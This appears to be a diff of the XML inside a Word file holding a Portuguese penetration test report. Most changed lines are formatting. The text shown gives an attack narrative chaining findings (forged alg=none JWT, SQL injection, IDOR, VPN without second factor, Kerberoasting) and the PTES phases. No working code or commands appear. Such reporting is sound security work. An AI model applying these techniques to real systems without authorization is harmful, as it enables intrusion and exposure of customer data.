+          <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideV w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
         </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
+        <w:gridCol w:w="5871"/>
+        <w:gridCol w:w="3875"/>
       </w:tblGrid>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="80" w:before="80"/>
+              <w:spacing w:before="80" w:after="80"/>
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72A88986" wp14:editId="46B0C67A">
                   <wp:extent cx="2190750" cy="1628775"/>
-                  <wp:effectExtent t="0" r="0" b="0" l="0"/>
-                  <wp:docPr id="1" name="" descr="" title=""/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="125586945" name="Picture 125586945"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -555,13 +678,13 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="" descr=""/>
+                          <pic:cNvPr id="0" name=""/>
                           <pic:cNvPicPr>
                             <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                           </pic:cNvPicPr>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId11" cstate="none"/>
+                          <a:blip r:embed="rId8"/>
                           <a:srcRect/>
                           <a:stretch>
                             <a:fillRect/>
@@ -586,24 +709,28 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="40"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="80" w:before="80"/>
+              <w:spacing w:before="80" w:after="80"/>
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06BB0646" wp14:editId="4FEC57A3">
                   <wp:extent cx="1428750" cy="1428750"/>
-                  <wp:effectExtent t="0" r="0" b="0" l="0"/>
-                  <wp:docPr id="1" name="" descr="" title=""/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="841456439" name="Picture 841456439"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -611,13 +738,13 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="" descr=""/>
+                          <pic:cNvPr id="0" name=""/>
                           <pic:cNvPicPr>
                             <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                           </pic:cNvPicPr>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId12" cstate="none"/>
+                          <a:blip r:embed="rId9"/>
                           <a:srcRect/>
                           <a:stretch>
                             <a:fillRect/>
@@ -674,12 +801,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">2 quick wins</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="220"/>
+        <w:t>2 quick wins</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="220"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -689,13 +816,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEÇÃO 2</w:t>
+        <w:t>SEÇÃO 2</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
+          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
         </w:pBdr>
         <w:spacing w:after="60"/>
       </w:pPr>
@@ -707,7 +834,7 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">Narrativa do Ataque</w:t>
+        <w:t>Narrativa do Ataque</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -721,20 +848,23 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Do reconhecimento ao impacto: como achados isolados se encadeiam em um caminho real de comprometimento.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80" w:before="80"/>
+        <w:t>Do reconhecimento ao impacto: como achados isolados se encadeiam em um caminho real de comprometimento.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="80"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38EAE880" wp14:editId="26E639A3">
             <wp:extent cx="5715000" cy="590550"/>
-            <wp:effectExtent t="0" r="0" b="0" l="0"/>
-            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1196304022" name="Picture 1196304022"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -742,13 +872,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPr id="0" name=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13" cstate="none"/>
+                    <a:blip r:embed="rId10"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -772,7 +902,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="20" w:before="80"/>
+        <w:spacing w:before="80" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -796,12 +926,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">A partir de fontes públicas e enumeração autorizada, mapeamos a loja, a API de pedidos e o acesso remoto (VPN), além de um caminho para a rede interna. A superfície exposta já indicava controles de autenticação frágeis.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="20" w:before="80"/>
+        <w:t>A partir de fontes públicas e enumeração autorizada, mapeamos a loja, a API de pedidos e o acesso remoto (VPN), além de um caminho para a rede interna. A superfície exposta já indicava controles de autenticação frágeis.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -821,7 +951,7 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">[F-01]</w:t>
+        <w:t>[F-01]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -835,12 +965,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">A API aceitava tokens JWT sem assinatura (alg=none). Forjamos um token de administrador e obtivemos acesso privilegiado à API — sem precisar de credenciais válidas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="20" w:before="80"/>
+        <w:t>A API aceitava tokens JWT sem assinatura (alg=none). Forjamos um token de administrador e obtivemos acesso privilegiado à API — sem precisar de credenciais válidas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -860,7 +990,7 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">[F-02, F-03]</w:t>
+        <w:t>[F-02, F-03]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -874,12 +1004,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">A busca da loja era vulnerável a SQL Injection, permitindo leitura do banco. Em paralelo, uma falha de autorização (IDOR) expunha pedidos e dados pessoais de outros clientes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="20" w:before="80"/>
+        <w:t>A busca da loja era vulnerável a SQL Injection, permitindo leitura do banco. Em paralelo, uma falha de autorização (IDOR) expunha pedidos e dados pessoais de outros clientes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -899,7 +1029,7 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">[F-07]</w:t>
+        <w:t>[F-07]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -913,12 +1043,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">O acesso remoto via VPN não exigia segundo fator. Com credenciais obtidas, entramos na rede interna, atingindo o domínio Active Directory de teste.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="20" w:before="80"/>
+        <w:t>O acesso remoto via VPN não exigia segundo fator. Com credenciais obtidas, entramos na rede interna, atingindo o domínio Active Directory de teste.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -938,7 +1068,7 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">[F-04]</w:t>
+        <w:t>[F-04]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -952,12 +1082,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Uma conta de serviço com senha fraca permitiu Kerberoasting: extraímos e quebramos o hash offline, assumindo uma conta privilegiada do domínio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="20" w:before="80"/>
+        <w:t>Uma conta de serviço com senha fraca permitiu Kerberoasting: extraímos e quebramos o hash offline, assumindo uma conta privilegiada do domínio.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -981,12 +1111,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Encadeando os achados, demonstramos um caminho plausível para expor toda a base de clientes e assumir controle administrativo do ambiente — tudo com provas de conceito não destrutivas, dentro do escopo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="220"/>
+        <w:t>Encadeando os achados, demonstramos um caminho plausível para expor toda a base de clientes e assumir controle administrativo do ambiente — tudo com provas de conceito não destrutivas, dentro do escopo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="220"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -996,13 +1126,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEÇÃO 3</w:t>
+        <w:t>SEÇÃO 3</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
+          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
         </w:pBdr>
         <w:spacing w:after="60"/>
       </w:pPr>
@@ -1014,7 +1144,7 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">Visão Geral de Risco</w:t>
+        <w:t>Visão Geral de Risco</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1028,46 +1158,62 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Distribuição de risco por probabilidade e impacto, e concentração por categoria de superfície avaliada.</w:t>
+        <w:t>Distribuição de risco por probabilidade e impacto, e concentração por categoria de superfície avaliada.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:type="pct" w:w="100%"/>
+        <w:tblW w:w="5000" w:type="pct"/>
         <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideV w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
         </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
+        <w:gridCol w:w="4708"/>
+        <w:gridCol w:w="5038"/>
       </w:tblGrid>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="80" w:before="80"/>
+              <w:spacing w:before="80" w:after="80"/>
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="693DF276" wp14:editId="088B8751">
                   <wp:extent cx="2667000" cy="2667000"/>
-                  <wp:effectExtent t="0" r="0" b="0" l="0"/>
-                  <wp:docPr id="1" name="" descr="" title=""/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="1979547015" name="Picture 1979547015"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1075,13 +1221,13 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="" descr=""/>
+                          <pic:cNvPr id="0" name=""/>
                           <pic:cNvPicPr>
                             <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                           </pic:cNvPicPr>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId14" cstate="none"/>
+                          <a:blip r:embed="rId11"/>
                           <a:srcRect/>
                           <a:stretch>
                             <a:fillRect/>
@@ -1106,24 +1252,28 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="40"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="80" w:before="80"/>
+              <w:spacing w:before="80" w:after="80"/>
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BD2D7DC" wp14:editId="12AFFDEC">
                   <wp:extent cx="2857500" cy="1390650"/>
-                  <wp:effectExtent t="0" r="0" b="0" l="0"/>
-                  <wp:docPr id="1" name="" descr="" title=""/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="729269417" name="Picture 729269417"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1131,13 +1281,13 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="" descr=""/>
+                          <pic:cNvPr id="0" name=""/>
                           <pic:cNvPicPr>
                             <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                           </pic:cNvPicPr>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId15" cstate="none"/>
+                          <a:blip r:embed="rId12"/>
                           <a:srcRect/>
                           <a:stretch>
                             <a:fillRect/>
@@ -1249,7 +1399,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:before="220"/>
+        <w:spacing w:before="220"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1259,13 +1409,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEÇÃO 4</w:t>
+        <w:t>SEÇÃO 4</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
+          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
         </w:pBdr>
         <w:spacing w:after="60"/>
       </w:pPr>
@@ -1277,7 +1427,7 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">Metodologia (PTES)</w:t>
+        <w:t>Metodologia (PTES)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1291,20 +1441,23 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">O engajamento seguiu as sete fases do Penetration Testing Execution Standard (PTES).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80" w:before="80"/>
+        <w:t>O engajamento seguiu as sete fases do Penetration Testing Execution Standard (PTES).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="80"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04AD08E6" wp14:editId="7D3B21F0">
             <wp:extent cx="5715000" cy="361950"/>
-            <wp:effectExtent t="0" r="0" b="0" l="0"/>
-            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1434613134" name="Picture 1434613134"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1312,13 +1465,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPr id="0" name=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16" cstate="none"/>
+                    <a:blip r:embed="rId13"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -1342,7 +1495,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1352,7 +1505,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">1. Interações pré-engajamento</w:t>
+        <w:t>1. Interações pré-engajamento</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1370,7 +1523,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Definição de escopo, janelas e regras de engajamento (RoE).</w:t>
+        <w:t>Definição de escopo, janelas e regras de engajamento (RoE).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1388,12 +1541,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Acordo de confidencialidade e canais de comunicação de emergência.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Acordo de confidencialidade e canais de comunicação de emergência.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1403,7 +1556,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">2. Coleta de inteligência</w:t>
+        <w:t>2. Coleta de inteligência</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1421,7 +1574,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">OSINT e enumeração passiva de subdomínios (CT logs, DNS).</w:t>
+        <w:t>OSINT e enumeração passiva de subdomínios (CT logs, DNS).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1439,12 +1592,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Fingerprinting de tecnologias, versões e superfícies expostas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Fingerprinting de tecnologias, versões e superfícies expostas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1454,7 +1607,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">3. Modelagem de ameaças</w:t>
+        <w:t>3. Modelagem de ameaças</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1472,7 +1625,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Mapeamento de ativos críticos e fluxos de dados (PII, pagamentos).</w:t>
+        <w:t>Mapeamento de ativos críticos e fluxos de dados (PII, pagamentos).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1490,12 +1643,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Identificação de atores e cenários de ataque prioritários.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Identificação de atores e cenários de ataque prioritários.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1505,7 +1658,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">4. Análise de vulnerabilidades</w:t>
+        <w:t>4. Análise de vulnerabilidades</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1523,7 +1676,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Análise de autenticação, sessão e autorização (IDOR/BOLA).</w:t>
+        <w:t>Análise de autenticação, sessão e autorização (IDOR/BOLA).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1541,12 +1694,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Testes de injeção, configuração de TLS e cabeçalhos de segurança.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Testes de injeção, configuração de TLS e cabeçalhos de segurança.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1556,7 +1709,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">5. Exploração</w:t>
+        <w:t>5. Exploração</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1574,7 +1727,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Validação prática (PoC) dos achados de aplicação e rede.</w:t>
+        <w:t>Validação prática (PoC) dos achados de aplicação e rede.</w:t>
       </w:r>
     </w:p>
     <w:p>
